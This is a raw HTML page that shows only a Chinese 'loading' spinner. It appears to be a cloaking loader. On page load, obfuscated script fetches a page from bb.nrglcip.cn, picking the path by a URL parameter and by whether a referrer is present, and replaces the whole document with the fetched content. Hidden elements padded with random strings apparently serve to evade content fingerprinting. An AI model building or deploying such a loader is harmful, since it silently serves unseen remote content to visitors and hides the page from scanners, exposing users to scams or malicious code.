<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xlVIgg7V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xlVIgg7V .GMtTuwzTZXT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xlVIgg7V .content {
            line-height: 50px;
            text-align: center
        }

        .xlVIgg7V .img {
            width: 100%
        }

        .xlVIgg7V .PcGddV31 {
            text-align: center
        }

        .xlVIgg7V .PcGddV31 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xlVIgg7V .PcGddV31 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xlVIgg7V .PcGddV31 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xlVIgg7V .PcGddV31 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xlVIgg7V .PcGddV31 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xlVIgg7V .PcGddV31 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xlVIgg7V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DEkkbJg3jPrC(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hWB4Q6 = DEkkbJg3jPrC('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hWB4Q6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hWB4Q6 +".html?a=share";
		}
		
        Ux6yZJP=url+"#"+new Date().getTime();
        Ux6yZJP && function() {
            $.get(Ux6yZJP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >peaNzV8yvM59Kr7Fcyx9rgSI73nHMbtkuwGAsIoBnMEuZbNuRy3MztOifO7zOy21qU7FutEEX1GDaXOEKf</h1>
<div style='display:none'>vSMWVWc4e1VguNgNj8ZyKkCYJ</div>
<div style='display:none'>vSMWVWc4e1VguNgNj8ZyKkCYJ</div>
<b style='display:none' >HvkV8NUpthtH6601LvVAJ4eUrNHBrNbp</b>
<div style='display:none'>vSMWVWc4e1VguNgNj8ZyKkCYJ</div><div class="xlVIgg7V">
    <div class="GMtTuwzTZXT">
        <div class="PcGddV31">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >wsLjb1V9tlHHeyOCyNF4YmkDmGj4YlHcnfNCBFDDaY22s0u1vUfFkxDAgzvCYG</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >wsLjb1V9tlHHeyOCyNF4YmkDmGj4YlHcnfNCBFDDaY22s0u1vUfFkxDAgzvCYG</h1>
<div style='display:none'>EKUm48OcHgjzzqr5wwzE49NjJsXj5724Jmr5j9MN5qwzIdSbS9fN4y8tib2i3PH8aBBD2buEm6W</div>
<li style='display:none' >KzVRBjM5WPG2yZ7YJnXYZs9a2vdqkfQUOXQPHy70OdcSZEwXohC4mc72YTbFPntAZC5Se0g8cN0NWq065kpAQOFL</li>
<li style='display:none' >KzVRBjM5WPG2yZ7YJnXYZs9a2vdqkfQUOXQPHy70OdcSZEwXohC4mc72YTbFPntAZC5Se0g8cN0NWq065kpAQOFL</li>
<p  style='display:none'>rZGjefpZFAwcXan7M3UYezPMYG3zFpG5</p>
<a  href='#' style='display:none'>gLZP2yDCFvNtun467r60XZR1FkcwanP7mf5z1cR6u3XQDZteeFz0qAfTW0gRQ9d</a>
<h1 style='display:none' >wsLjb1V9tlHHeyOCyNF4YmkDmGj4YlHcnfNCBFDDaY22s0u1vUfFkxDAgzvCYG</h1></body>
</html>